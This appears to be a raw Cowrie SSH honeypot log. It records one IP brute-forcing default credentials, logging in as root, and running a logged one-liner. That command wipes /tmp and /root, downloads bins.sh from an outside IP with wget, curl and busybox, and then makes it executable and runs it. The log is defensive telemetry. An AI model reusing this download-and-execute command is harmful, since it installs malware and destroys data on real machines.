{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.329939Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.345653Z","src_ip":"212.227.125.160","session":"a0191427ad90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":975,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.350650Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.352284Z","src_ip":"212.227.125.160","session":"b81abb78a8e6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.352762Z","src_ip":"212.227.125.160","session":"b81abb78a8e6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.354855Z","src_ip":"212.227.125.160","session":"9c2d0d6ba140"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.355337Z","src_ip":"212.227.125.160","session":"9c2d0d6ba140"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.370389Z","src_ip":"212.227.125.160","session":"e7355599d5c5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.371070Z","src_ip":"212.227.125.160","session":"e7355599d5c5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.373169Z","src_ip":"212.227.125.160","session":"95bdf9331e8f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.373760Z","src_ip":"212.227.125.160","session":"95bdf9331e8f"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.388643Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55032,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea0fba322ac0","protocol":"ssh","message":"New connection: 212.227.125.160:55032 (1.2.3.4:22) [session: ea0fba322ac0]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.406553Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.477331Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:40.514131Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.514830Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.516988Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.517646Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.637901Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.639025Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55040,"dst_ip":"1.2.3.4","dst_port":22,"session":"08391e314476","protocol":"ssh","message":"New connection: 212.227.125.160:55040 (1.2.3.4:22) [session: 08391e314476]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.693527Z"}
{"eventid":"cowrie.login.failed","username":"student","password":"ubnt","message":"login attempt [student/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.728638Z","src_ip":"212.227.125.160","session":"9c2d0d6ba140"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.780776Z","src_ip":"212.227.125.160","session":"08391e314476"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.781680Z","src_ip":"212.227.125.160","session":"08391e314476"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.820528Z","src_ip":"212.227.125.160","session":"d69cdf6c6f9d"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.834825Z","src_ip":"212.227.125.160","session":"41cfb9f79963"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.907115Z","src_ip":"212.227.125.160","session":"b81abb78a8e6"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ubnt","message":"login attempt [noc/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.923023Z","src_ip":"212.227.125.160","session":"95bdf9331e8f"}
{"eventid":"cowrie.login.success","username":"root","password":"ftpuser","message":"login attempt [root/ftpuser] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.021707Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.065675Z","src_ip":"102.210.148.92","session":"f383a266fc01"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ubnt","message":"login attempt [admin/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.074557Z","src_ip":"212.227.125.160","session":"e7355599d5c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:41.122487Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.123371Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.168745Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.183313Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.441614Z","src_ip":"212.227.125.160","session":"a0191427ad90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55046,"dst_ip":"1.2.3.4","dst_port":22,"session":"9562c6ea58ff","protocol":"ssh","message":"New connection: 212.227.125.160:55046 (1.2.3.4:22) [session: 9562c6ea58ff]","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.511140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.532828Z","src_ip":"212.227.125.160","session":"9562c6ea58ff"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.559734Z","src_ip":"212.227.125.160","session":"9562c6ea58ff"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ubnt","message":"login attempt [pi/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.728432Z","src_ip":"212.227.125.160","session":"9562c6ea58ff"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.774443Z","src_ip":"212.227.125.160","session":"9c2d0d6ba140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55060,"dst_ip":"1.2.3.4","dst_port":22,"session":"83aca2628d28","protocol":"ssh","message":"New connection: 212.227.125.160:55060 (1.2.3.4:22) [session: 83aca2628d28]","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.817193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.818069Z","src_ip":"212.227.125.160","session":"83aca2628d28"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.863775Z","src_ip":"212.227.125.160","session":"83aca2628d28"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.868845Z","src_ip":"212.227.125.160","session":"d69cdf6c6f9d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.908742Z","src_ip":"212.227.125.160","session":"41cfb9f79963"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55074,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40f57a5718f","protocol":"ssh","message":"New connection: 212.227.125.160:55074 (1.2.3.4:22) [session: f40f57a5718f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.958781Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55086,"dst_ip":"1.2.3.4","dst_port":22,"session":"59cab2b7a601","protocol":"ssh","message":"New connection: 212.227.125.160:55086 (1.2.3.4:22) [session: 59cab2b7a601]","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.974382Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.981101Z","src_ip":"212.227.125.160","session":"b81abb78a8e6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:41.997370Z","src_ip":"212.227.125.160","session":"f40f57a5718f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55096,"dst_ip":"1.2.3.4","dst_port":22,"session":"4375e6e3b841","protocol":"ssh","message":"New connection: 212.227.125.160:55096 (1.2.3.4:22) [session: 4375e6e3b841]","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.022565Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.027815Z","src_ip":"212.227.125.160","session":"95bdf9331e8f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.077974Z","src_ip":"212.227.125.160","session":"59cab2b7a601"}
